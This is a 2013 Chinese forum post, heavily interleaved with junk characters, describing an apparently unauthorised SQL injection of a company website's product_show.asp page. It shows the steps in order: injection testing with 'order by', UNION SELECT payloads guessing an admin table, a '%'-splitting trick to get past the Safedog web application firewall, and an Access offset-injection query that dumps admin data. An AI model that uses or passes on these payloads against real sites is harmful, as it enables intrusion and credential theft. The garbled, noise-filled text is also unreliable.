打开网站,一个企业站。
% z+ _6 g5 {$ e2 d! R0 g2 t6 ?) F3 o2 ^; G' [( i
! [- t9 S. v5 a3 ]4 l顺手加个admin# f& t0 r+ a6 I' j' Z: `
( z% d/ O7 I, C* T7 X. g M4 L
8 E( \8 ?3 t7 g% C, d! T
默认后台。4 C, ^ M% ^* y3 Z, _3 f
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。' w& }) ]# @4 y8 b$ Y' t
2 ?- p4 g: m" z9 m$ x8 u& x% q1 g! Q) u0 f! x8 a! |. q
6 H1 S$ O4 _/ o! R1 c5 }$ t
所以就不用御剑扫了,待会直接封IP。
$ n5 L$ w( y {' Y ! l6 T7 ]. J Q7 l' Z2 R6 [) W
用order by语句判断是否存在注入。' u8 e R% J+ v" N; J" v
http://www.xxx.com /product_show.asp?id=997 order by 19 z- M/ `2 g, Y! C+ q$ M
http://www.xxx.com /product_show.asp?id=997 order by 100; l6 {0 V9 W3 \
现在存在注入,经测试后发现是9个字段。
) w1 R" A! E& s 7 A/ j& j9 N. A
接下来进行联合查询,猜是否存在admin表。# k0 b- v8 E) K! ]+ m
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
K/ ^. ~+ q$ W0 h1 U; | D, E, g" E( a ]0 g K
" U# t) p. y/ q; b! [
% u" Z8 j f' |9 S2 N; N
在select中间加个%,se%lect绕过安全狗。& @" Q, E8 _; N8 }: X
% T( x. E0 C' Z1 J2 Q
5 J( w+ i' a6 Z! u& g3 d+ W发现存在admin表,然后开始手工猜常用的字段。) A6 j2 I+ a+ g% o2 C6 a2 Q! x
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
3 n7 M6 X4 v; K. P . X9 a3 B9 R$ O! v; X# s
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。 G c; _4 }! c9 m! [
& r( Y7 e; i6 v科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
& r3 b4 h( I% A* @; B+ s8 F: Bhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin, K- I; }7 p: J% h2 a+ ^) K8 ^
好了,敏感内容出显了。( X2 q+ v }) o% q3 u) ^
% C' E. z# y6 ?! P* R: M! [$ H
: q# H; l" F @; k* W5 @6 b7 w% p
8 S' s& f/ s& g2 o( ~+ S6 Q
|
发表于 2013-3-8 21:49:45
收藏
支持
反对